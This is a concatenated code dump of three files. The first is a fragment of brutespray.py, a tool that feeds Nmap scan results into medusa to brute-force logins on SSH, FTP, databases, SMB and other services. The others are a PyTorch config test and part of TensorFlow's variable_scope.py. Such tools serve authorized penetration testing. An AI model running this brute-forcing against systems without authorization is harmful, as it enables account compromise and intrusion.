if filename.endswith("gnmap"):
in_format = "gnmap"
if filename.endswith("json"):
in_format = "json"
if filename.endswith("xml"):
in_format = "xml"
if '{' in line[0]:
in_format = "json"
if '# Nmap' in line[0] and not 'Nmap' in line[1]:
in_format = "gnmap"
if '<?xml ' in line[0]:
in_format = "xml"
if in_format is None:
print('File is not correct format!\n')
sys.exit(0)
return in_format
def parse_args():
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, description=\
"Usage: python brutespray.py <OPTIONS> \n")
menu_group = parser.add_argument_group(colors.lightblue + 'Menu Options' + colors.normal)
menu_group.add_argument('-f', '--file', help="GNMAP, JSON or XML file to parse", required=False, default=None)
menu_group.add_argument('-o', '--output', help="Directory containing successful attempts", default="brutespray-output")
menu_group.add_argument('-s', '--service', help="specify service to attack", default="all")
menu_group.add_argument('-t', '--threads', help="number of medusa threads", default="2")
menu_group.add_argument('-T', '--hosts', help="number of hosts to test concurrently", default="1")
menu_group.add_argument('-U', '--userlist', help="reference a custom username file", default=None)
menu_group.add_argument('-P', '--passlist', help="reference a custom password file", default=None)
menu_group.add_argument('-C', '--combo', help="specify a combo input (host:user:password)", default=None)
menu_group.add_argument('-u', '--username', help="specify a single username", default=None)
menu_group.add_argument('-p', '--password', help="specify a single password", default=None)
menu_group.add_argument('-c', '--continuous', help="keep brute-forcing after success", default=False, action='store_true')
menu_group.add_argument('-i', '--interactive', help="interactive mode", default=False, action='store_true')
menu_group.add_argument('-m', '--modules', help="dump a list of available modules to brute", default=False, action='store_true')
    menu_group.add_argument('-q', '--quiet', help="suppress banner", default=False, action='store_true')
menu_group.add_argument('-v', '--verbose', help="verbose output from medusa [0-6], default=5", default="5")
menu_group.add_argument('-w', '--debug', help="debug error output from medusa [0-10], default=5", default="5")
args = parser.parse_args()
if args.file is None and args.modules is False:
parser.error("argument -f/--file is required")
return args
if __name__ == "__main__":
args = parse_args()
if args.quiet == False:
print(banner)
else:
print(quiet_banner)
supported = ['ssh','ftp','telnet','vnc','mssql','mysql','postgresql','rsh',
'imap','nntp','pcanywhere','pop3',
'rexec','rlogin','smbnt','smtp',
'svn','vmauthd','snmp']
#temporary directory for ip addresses
if args.modules is True:
print(colors.lightblue + "Supported Services:\n" + colors.green)
print(('\n'.join(supported)))
print(colors.normal + "\n")
try:
tmppath = tempfile.mkdtemp(prefix="brutespray-tmp")
except:
sys.stderr.write("\nError while creating brutespray temp directory.")
exit(4)
if not os.path.exists(args.output):
os.mkdir(args.output)
if os.system("command -v medusa > /dev/null") != 0:
sys.stderr.write("Command medusa not found. Please install medusa before using brutespray")
exit(3)
if args.file is None:
sys.exit(0)
if args.passlist and not os.path.isfile(args.passlist):
sys.stderr.write("Passlist given does not exist. Please check your file or path\n")
exit(3)
if args.userlist and not os.path.isfile(args.userlist):
sys.stderr.write("Userlist given does not exist. Please check your file or path\n")
exit(3)
if args.combo and not os.path.isfile(args.combo):
sys.stderr.write("Combolist given does not exist. Please check your file or path\n")
if os.path.isfile(args.file):
try:
            t = threading.Thread(target=loading_animation)
t.start()
in_format = getInput(args.file)
{
"gnmap": make_dic_gnmap,
"xml": make_dic_xml,
"json": make_dic_json
}[in_format]()
except:
print("\nFormat failed!\n")
loading = True
sys.exit(0)
if args.interactive is True:
interactive()
animate()
if services == {}:
print("\nNo brutable services found.\n Please check your Nmap file.")
else:
print("\nError loading file, please check your filename.")
to_scan = args.service.split(',')
for service in services:
if service in to_scan or to_scan == ['all']:
for port in services[service]:
fname = tmppath + '/' +service + '-' + port
iplist = services[service][port]
f = open(fname, 'w+')
for ip in iplist:
f.write(ip + '\n')
f.close()
brute_process = Process(target=brute, args=(service,port,fname,args.output,args.userlist,args.username,args.passlist,args.password,args.continuous,args.hosts,args.threads,args.verbose,args.combo,args.debug))
brute_process.start()
#need to wait for all of the processes to run...
|
test_frozen_attribs.py
|
from typing import Dict, Any
import torch.multiprocessing as mp
from torch import nn
from core.base_abstractions.experiment_config import ExperimentConfig
from core.base_abstractions.task import TaskSampler
from utils.experiment_utils import TrainingPipeline
# noinspection PyAbstractClass,PyTypeChecker
class MyConfig(ExperimentConfig):
MY_VAR: int = 3
@classmethod
def tag(cls) -> str:
return ""
@classmethod
def training_pipeline(cls, **kwargs) -> TrainingPipeline:
return None
@classmethod
def create_model(cls, **kwargs) -> nn.Module:
return None
@classmethod
def make_sampler_fn(cls, **kwargs) -> TaskSampler:
return None
def my_var_is(self, val):
assert self.MY_VAR == val
# noinspection PyAbstractClass
class MySpecConfig(MyConfig):
MY_VAR = 6
@classmethod
def machine_params(cls, mode="train", **kwargs) -> Dict[str, Any]:
return {}
@classmethod
def tag(cls) -> str:
return "SpecTag"
scfg = MySpecConfig()
class TestFrozenAttribs(object):
def test_frozen_inheritance(self):
from abc import abstractmethod
from core.base_abstractions.experiment_config import FrozenClassVariables
class SomeBase(metaclass=FrozenClassVariables):
yar = 3
@abstractmethod
def use(self):
raise NotImplementedError()
class SomeDerived(SomeBase):
yar = 33
def use(self):
return self.yar
failed = False
try:
SomeDerived.yar = 6 # Error
except Exception as _:
failed = True
assert failed
inst = SomeDerived()
inst2 = SomeDerived()
inst.yar = 12 # No error
assert inst.use() == 12
assert inst2.use() == 33
@staticmethod
def my_func(config, val):
config.my_var_is(val)
def test_frozen_experiment_config(self):
val = 5
failed = False
try:
MyConfig()
except:
failed = True
assert failed
scfg.MY_VAR = val
scfg.my_var_is(val)
failed = False
try:
MyConfig.MY_VAR = val
except RuntimeError:
failed = True
assert failed
failed = False
try:
MySpecConfig.MY_VAR = val
except RuntimeError:
failed = True
assert failed
for fork_method in ["forkserver", "fork"]:
ctxt = mp.get_context(fork_method)
p = ctxt.Process(target=self.my_func, kwargs=dict(config=scfg, val=val))
p.start()
p.join()
if __name__ == "__main__":
TestFrozenAttribs().test_frozen_inheritance() # type:ignore
TestFrozenAttribs().test_frozen_experiment_config() # type:ignore
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange, zip # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.types import core
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
_api_usage_gauge = monitoring.BoolGauge(
"/tensorflow/api/resource_variables",
"Whether variable_scope.enable_resource_variables() is called.")
class _PartitionInfo(object):
"""Holds partition info used by initializer functions."""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape of
the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for offset, shape in zip(var_offset, full_shape):
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(shape),
self.full_shape,
len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
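# Illustrative sketch (hypothetical helper, not part of the public API): how
# `_PartitionInfo` reports offsets for a variable of full shape [10, 20] that
# is split into two shards along dimension 1.
def _example_partition_info():
  info = _PartitionInfo(full_shape=[10, 20], var_offset=[0, 10])
  # This shard covers columns 10..19, so the single partitioned dimension is 1
  # and the offset within that dimension is 10.
  assert info.single_slice_dim([10, 10]) == 1
  assert info.single_offset([10, 10]) == 10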
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
_api_usage_gauge.get_cell().set(True)
@tf_export(v1=["resource_variables_enabled"])
def resource_variables_enabled():
"""Returns `True` if resource variables are enabled.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
return _DEFAULT_USE_RESOURCE
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
_api_usage_gauge.get_cell().set(False)
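# Illustrative sketch (hypothetical helper, not part of the public API): the
# module-level default toggled by the three functions above can be flipped and
# inspected as follows; `disable_resource_variables` additionally emits a
# deprecation warning.
def _example_resource_variable_toggle():
  enable_resource_variables()
  assert resource_variables_enabled()
  disable_resource_variables()
  assert not resource_variables_enabled()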
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys and
the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). `trainable`
defaults to `True`, unless `synchronization` is set to `ON_READ`, in
which case it defaults to `False`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method. The signature
of `custom_getter` should match that of this method,
        but the most future-proof version will allow for changes:
        `def custom_getter(getter, *args, **kwargs)`. Direct access to
        all `get_variable` parameters is also allowed:
        `def custom_getter(getter, name, *args, **kwargs)`. A simple identity
        custom getter that simply creates variables with modified names is:
        ```python
        def custom_getter(getter, name, *args, **kwargs):
          return getter(name + '_suffix', *args, **kwargs)
        ```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
      synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError("Passed a custom_getter which is not callable: %s" %
custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
    # stack. We avoid this by using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (
shape is not None and isinstance(shape, collections_lib.Sequence) and
not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError("Partitioner must be callable, but received: %s" %
partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
synchronization, aggregation, trainable, name))
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable (defaults to
`DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
      synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
partitions = None
if not reuse or partitioner:
partitions = _call_partitioner(partitioner, shape, dtype)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?" % name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s." % (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s." % (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (partitions is not None and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, num_slices = _get_slice_dim_and_num_slices(partitions)
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not." %
(num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d." %
(num_slices, name, name, num_slices))
vs = []
for i, (var_offset, var_shape) in enumerate(
_iter_slices(shape.as_list(), num_slices, slice_dim)):
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(
var_full_name + "/PartitionedInitializer", skip_on_eager=False):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: disable=protected-access
var._set_save_slice_info(
variables.Variable.SaveSliceInfo(name, shape.as_list(), var_offset,
var_shape))
vs.append(var)
# pylint: enable=protected-access
partitioned_var = variables.PartitionedVariable(
name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
if not context.executing_eagerly() or self._store_eager_variables:
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g.
a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
